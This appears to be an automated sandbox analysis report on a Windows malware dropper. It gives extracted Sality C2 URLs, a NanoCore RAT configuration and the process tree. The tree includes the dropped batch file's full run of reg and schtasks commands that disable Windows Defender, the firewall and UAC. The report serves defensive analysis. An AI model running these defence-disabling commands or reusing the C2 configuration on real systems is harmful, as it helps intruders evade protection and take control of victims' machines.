Analysis
-
max time kernel
148s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09-10-2024 05:08
Static task
static1
Behavioral task
behavioral1
Sample
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
Resource
win7-20240708-en
General
-
Target
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
-
Size
17.0MB
-
MD5
2b66ca254c7c9100343699af457f9d81
-
SHA1
36a13e65f57b4ed2f515e752f7ab29b68aa341c7
-
SHA256
1fd3e2f6d6e9166cba0086664635f86ba4b4aaf1277a853cf718f6f24d672d6d
-
SHA512
4ad6155146eecfcc5f2638772444056ed2c7ebd6867711be66cab87c3156820ce1bb179b96762ae2db3bb98fca16c0daab5e5dc9da294cb3963cd2ba3151ec85
-
SSDEEP
393216:UHNOPJo4+k2Br1BMgUD6okK/o4CgMi4GZfT2qZV5:UtOdB2B0gmNkK/Zv4GZPV
Malware Config
Extracted
sality
http://89.119.67.154/testo5/
http://kukutrustnet777.info/home.gif
http://kukutrustnet888.info/home.gif
http://kukutrustnet987.info/home.gif
http://www.klkjwre9fqwieluoi.info/
http://kukutrustnet777888.info/
http://klkjwre77638dfqwieuoi888.info/
Extracted
nanocore
1.2.2.0
hitexe.endofinternet.net:33045
f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2020-12-29T23:08:57.329436536Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
33045
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
hitexe.endofinternet.net
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Modifies firewall policy service 3 TTPs 3 IoCs
Processes:
nb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" nb660-full.exe -
Processes:
nb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" nb660-full.exe -
Processes:
nb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" nb660-full.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
nb660-full.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1" nb660-full.exe -
Disables Task Manager via registry modification
-
Deletes itself 1 IoCs
Processes:
nb660-full.exepid Process 2716 nb660-full.exe -
Executes dropped EXE 4 IoCs
Processes:
MsPlaying.exeMsfUpdate.exenb660-full.exeMsfUpdate.exepid Process 2912 MsPlaying.exe 2764 MsfUpdate.exe 2716 nb660-full.exe 2780 MsfUpdate.exe -
Loads dropped DLL 20 IoCs
Processes:
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exenb660-full.exeMsfUpdate.exepid Process 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2764 MsfUpdate.exe 2716 nb660-full.exe -
Processes:
nb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" nb660-full.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" nb660-full.exe -
Processes:
nb660-full.exeMsfUpdate.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" nb660-full.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MsfUpdate.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MsfUpdate.exedescription pid Process procid_target PID 2764 set thread context of 2780 2764 MsfUpdate.exe 68 -
Processes:
resource yara_rule behavioral1/memory/2716-65-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-72-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-51-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-59-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-137-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-73-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-66-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-58-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-139-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-57-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-53-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-140-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-141-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-138-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-157-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-160-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-162-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-170-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx behavioral1/memory/2716-172-0x0000000001E00000-0x0000000002E8E000-memory.dmp upx -
Drops file in Program Files directory 5 IoCs
Processes:
nb660-full.exedescription ioc Process File opened for modification C:\PROGRAM FILES\7-ZIP\7z.exe nb660-full.exe File opened for modification C:\PROGRAM FILES\7-ZIP\7zFM.exe nb660-full.exe File opened for modification C:\PROGRAM FILES\7-ZIP\7zG.exe nb660-full.exe File opened for modification C:\PROGRAM FILES\7-ZIP\Uninstall.exe nb660-full.exe File opened for modification C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\OFFICE14\BCSSYNC.EXE nb660-full.exe -
Drops file in Windows directory 1 IoCs
Processes:
nb660-full.exedescription ioc Process File opened for modification C:\Windows\SYSTEM.INI nb660-full.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exeMsfUpdate.exenb660-full.exeMsPlaying.exeschtasks.exeMsfUpdate.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsfUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nb660-full.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsPlaying.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsfUpdate.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x0007000000016ca5-43.dat nsis_installer_1 behavioral1/files/0x0007000000016ca5-43.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
nb660-full.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz nb660-full.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nb660-full.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
nb660-full.exeMsfUpdate.exeMsfUpdate.exepid Process 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2764 MsfUpdate.exe 2780 MsfUpdate.exe 2780 MsfUpdate.exe 2780 MsfUpdate.exe 2780 MsfUpdate.exe 2780 MsfUpdate.exe 2780 MsfUpdate.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe 2716 nb660-full.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
MsfUpdate.exenb660-full.exepid Process 2780 MsfUpdate.exe 2716 nb660-full.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
nb660-full.exeMsfUpdate.exeMsfUpdate.exedescription pid Process Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2764 MsfUpdate.exe Token: SeDebugPrivilege 2780 MsfUpdate.exe Token: SeDebugPrivilege 2716 nb660-full.exe Token: SeDebugPrivilege 2716 nb660-full.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exenb660-full.exeMsPlaying.execmd.exedescription pid Process procid_target PID 2332 wrote to memory of 2912 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 31 PID 2332 wrote to memory of 2912 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 31 PID 2332 wrote to memory of 2912 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 31 PID 2332 wrote to memory of 2912 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 31 PID 2332 wrote to memory of 2764 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 33 PID 2332 wrote to memory of 2764 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 33 PID 2332 wrote to memory of 2764 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 33 PID 2332 wrote to memory of 2764 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 33 PID 2332 wrote to memory of 2764 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 33 PID 2332 wrote to memory of 2764 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 33 PID 2332 wrote to memory of 2764 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 33 PID 2332 wrote to memory of 2716 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 34 PID 2332 wrote to memory of 2716 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 34 PID 2332 wrote to memory of 2716 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 34 PID 2332 wrote to memory of 2716 2332 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 34 PID 2716 wrote to memory of 1108 2716 nb660-full.exe 19 PID 2716 wrote to memory of 1172 2716 nb660-full.exe 20 PID 2716 wrote to memory of 1228 2716 nb660-full.exe 21 PID 2716 wrote to memory of 1080 2716 nb660-full.exe 23 PID 2716 wrote to memory of 2912 2716 nb660-full.exe 31 PID 2716 wrote to memory of 2912 2716 nb660-full.exe 31 PID 2716 wrote to memory of 2416 2716 nb660-full.exe 32 PID 2716 wrote to memory of 2764 2716 nb660-full.exe 33 PID 2716 wrote to memory of 2764 2716 nb660-full.exe 33 PID 2912 wrote to memory of 1900 2912 MsPlaying.exe 35 PID 2912 wrote to memory of 1900 2912 MsPlaying.exe 35 PID 2912 wrote to memory of 1900 2912 MsPlaying.exe 35 PID 2912 wrote to memory of 1900 2912 MsPlaying.exe 35 PID 1900 wrote to memory of 1148 1900 cmd.exe 36 PID 1900 wrote to memory of 1148 1900 cmd.exe 36 PID 1900 wrote to memory of 1148 1900 cmd.exe 36 PID 1900 wrote to memory of 1636 1900 cmd.exe 37 PID 1900 wrote to memory of 1636 1900 cmd.exe 37 PID 1900 wrote to memory of 1636 1900 cmd.exe 37 PID 1900 wrote to memory of 2064 1900 cmd.exe 38 PID 1900 wrote to memory of 2064 1900 cmd.exe 38 PID 1900 wrote to memory of 2064 1900 cmd.exe 38 PID 1900 wrote to memory of 1068 1900 cmd.exe 39 PID 1900 wrote to memory of 1068 1900 cmd.exe 39 PID 1900 wrote to memory of 1068 1900 cmd.exe 39 PID 1900 wrote to memory of 2184 1900 cmd.exe 40 PID 1900 wrote to memory of 2184 1900 cmd.exe 40 PID 1900 wrote to memory of 2184 1900 cmd.exe 40 PID 1900 wrote to memory of 2200 1900 cmd.exe 41 PID 1900 wrote to memory of 2200 1900 cmd.exe 41 PID 1900 wrote to memory of 2200 1900 cmd.exe 41 PID 1900 wrote to memory of 2908 1900 cmd.exe 42 PID 1900 wrote to memory of 2908 1900 cmd.exe 42 PID 1900 wrote to memory of 2908 1900 cmd.exe 42 PID 1900 wrote to memory of 2148 1900 cmd.exe 43 PID 1900 wrote to memory of 2148 1900 cmd.exe 43 PID 1900 wrote to memory of 2148 1900 cmd.exe 43 PID 1900 wrote to memory of 572 1900 cmd.exe 44 PID 1900 wrote to memory of 572 1900 cmd.exe 44 PID 1900 wrote to memory of 572 1900 cmd.exe 44 PID 1900 wrote to memory of 2208 1900 cmd.exe 45 PID 1900 wrote to memory of 2208 1900 cmd.exe 45 PID 1900 wrote to memory of 2208 1900 cmd.exe 45 PID 1900 wrote to memory of 2052 1900 cmd.exe 46 PID 1900 wrote to memory of 2052 1900 cmd.exe 46 PID 1900 wrote to memory of 2052 1900 cmd.exe 46 PID 1900 wrote to memory of 2376 1900 cmd.exe 47 PID 1900 wrote to memory of 2376 1900 cmd.exe 47 PID 1900 wrote to memory of 2376 1900 cmd.exe 47 -
System policy modification 1 TTPs 1 IoCs
Processes:
nb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" nb660-full.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵PID:1108
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1172
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FA75.tmp\FA76.tmp\FA77.bat C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:1148
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:1636
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:2064
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:1068
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵PID:2184
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵PID:2200
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵PID:2908
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:2148
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵PID:572
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:2208
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:2052
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:2376
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:2948
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:2944
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:2532
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:2392
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:2436
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:448
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:612
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:1680
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:1200
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:1532
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:2320
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:696
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:2512
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:2196
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:2940
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:1372
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:1780
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:2124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe"C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eRuAlzO" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7CBE.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2308
-
-
C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe"{path}"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\nb660-full.exe"C:\Users\Admin\AppData\Local\Temp\nb660-full.exe"3⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Disables RegEdit via registry modification
- Deletes itself
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2716
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1080
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-359708948128964865-790273131-117907456564744033143550086511832053781108039754"1⤵PID:2416
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5665f21a9b6730aa08e62473e481b8c55
SHA1717d52e75ac16bf032299828dd61c86af281eb43
SHA256dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
SHA512b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e
-
Filesize
934B
MD520e22e58357bf5efd453f66090fabec3
SHA173c9b7e6ef3c3a5b03826f9e274df1a3a36c585d
SHA256677447273c583bde1d350dc29f10ac77e2067a6ddfca1eac51e088e969a35e85
SHA512d8d4558f17767e6821c3fd57c979ae42d710aacf3eb536b81962714fab6dd680e5d6cdd44a7f236e0f7a4cb5bd993c0c3dfa37ace1b44ebb176dbee2c510afb2
-
Filesize
1KB
MD54fcce09eb10a2602dbdb757dbd3e5223
SHA1f9f2b1f9ce1c72969cc56a3b9b033639d1510c27
SHA256bf31c19e88ed9a1b4ccabdad768d6e4202805fc48b89116c323f12a3e45c9947
SHA5121e6de4abecce2bccf20f10c0756be45213e7608982b1c60ddd4efa25af40e3e5d914f931b469328ae8f8308b8405b7c8435f72d143cf440e6c2a923527521302
-
Filesize
1KB
MD59059115eface5fff049b74bff0f79087
SHA15db304c4d025542b97f36cd82a0913a3473b87e7
SHA2563ec37787b890b40ef9da98873a1553cae14137daef7e509c63281eed084aa436
SHA512d8e337248179e75103cb858bce575aba70c02857d0e47f1ad2ad6d24decbf9c8b775db0dbf931404d962ec6e06c325eb47a5602bb5e08b3e4c619945a2db3237
-
Filesize
3.0MB
MD5ab43042da67bbac3ee18248ee40d4c7e
SHA110aa258234918a4231ee9a5c222f27c8a9a4d69d
SHA256fda0366362c09fe1538c6ccca5a67aba4ee3f15da38ba91276dcab13dc7ad4f1
SHA512b9657448c677ee458c63d09e05edcfdb0e92168155bc39b8c34092b17dd877232d99680fbf6e952b884dd294300d4f0c56ab6f93d07f506bc017f3988ef8538c
-
Filesize
919KB
MD5a102b1ee34e498fb8458a6be30ba15e7
SHA1b586c1bc68a67b6fc7762d5ce7ecae8343d8e006
SHA2560b533b19d6e78fdb0e9c7c3616da7641f3b8f9a2761da345efba417a15cc72c6
SHA5120b49ce905e76f643019643e9ac42aaf31cdf50ed8294420a936ccce0eca0749d1baddb3c80a28a24ca6f91cd6ff044ec6dea9b4bd5e36c65341395199848483b
-
Filesize
12.5MB
MD5d8865f463ff9f148fc62ca1a0e3db0fd
SHA11bdd1e03a7002261810ca0d39d785d53c2b2bb3c
SHA256fd56f3d15c22eacf304b5ecd000a39158f7dd43a139d22140f28d5d621fc1fc7
